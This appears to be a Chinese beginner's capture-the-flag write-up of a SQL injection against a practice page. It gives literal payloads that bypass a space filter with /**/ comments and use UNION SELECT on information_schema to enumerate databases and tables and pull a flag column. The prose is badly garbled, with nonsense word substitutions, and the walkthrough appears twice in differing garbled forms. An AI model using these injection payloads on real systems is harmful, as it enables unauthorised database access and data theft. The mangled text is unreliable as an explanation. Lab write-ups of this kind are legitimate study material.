分享一个简单的sql注入

所谓SQL注入,正是通过把SQL命令插入到Web表单提交或输入域名或页面诉求的查询字符串,最后实现棍骗服务器推行恶意的SQL命令。具体来讲,它是使用现成应用程序,将的SQL命令注入到后台数据库引擎施行的力量,它能够通过在Web表单中输入SQL语句获得叁个存在安全漏洞的网址上的数据库,并不是遵守设计者意图去施行SQL语句。譬喻原先的居多摄像网址走漏VIP会员密码许多就是通过WEB表单递交查询字符暴出的,那类表单非常轻便受到sql注入攻击。

独家输入1,2,3有照料的结果

使用’会报错,于是

布局常用的sql语句:1′ and ‘1’=’1

从未反应试风流罗曼蒂克试1′ and ‘1’=’2

要么没影响,工具提示,应该是过滤了怎么,改一下sql语句试生机勃勃试

1and1=1

能够展现东西,经过判定过滤了空格,大家选择/**/来代替空格

试一试1’/**/and/**/’1’=’1

发觉有结果了:

于是乎营造sql语句:

判别有那多少个数据库:

1'/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/'1'='1

能够看出结果:

查看有怎么着数据表:

1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1

察觉了flag的表,大家猜忌应该是在web1数据库中並且字段正是flag(其实就在本页面包车型客车数据库中卡塔尔

故:

1'/**/union/**/select/**/flag/**/from/**/web1.flag/**/where/**/'1'='1

作者也是初大方,参照他事他说加以考察了大多大佬的wp
本身写出来后有如何错误的地点,希望大家提出,多谢!

依照页面提醒,到底过滤了什么样东西得以知晓迟早过滤了什么样….

分级输入1,2,3有照应的结果

使用’会报错,于是

协会常用的sql语句:1′ and ‘1’=’1

从未有过反应试一试1′ and ‘1’=’2

或许没影响,工具提醒,应该是过滤了怎么着,改一下sql语句试大器晚成试

1and1=1

能够显得东西,经过推断过滤了空格,大家使用/**/来代替空格

试一试1’/**/and/**/’1’=’1

开采成结果了:

于是创设sql语句:

看清有那三个数据库:

1'/**/union/**/select/**/schema_name/**/from/**/information_schema.schemata/**/where/**/'1'='1

可以见见结果:

翻看有怎样数据表:

1'/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/'1'='1

开采了flag的表,大家思疑应该是在web1数据库中何况字段正是flag(其实就在本页面包车型大巴数据库中卡塔尔

故:

1'/**/union/**/select/**/flag/**/from/**/web1.flag/**/where/**/'1'='1

总结

如上所述是作者给我们介绍的贰个简约的sql注入,希望对大家全体助于,借使大家有任何疑问请给本身留言,小编会及时苏醒大家的。在这里也非常感激大家对台本之家网址的支撑!

相关文章

发表评论

电子邮件地址不会被公开。 必填项已用*标注

网站地图xml地图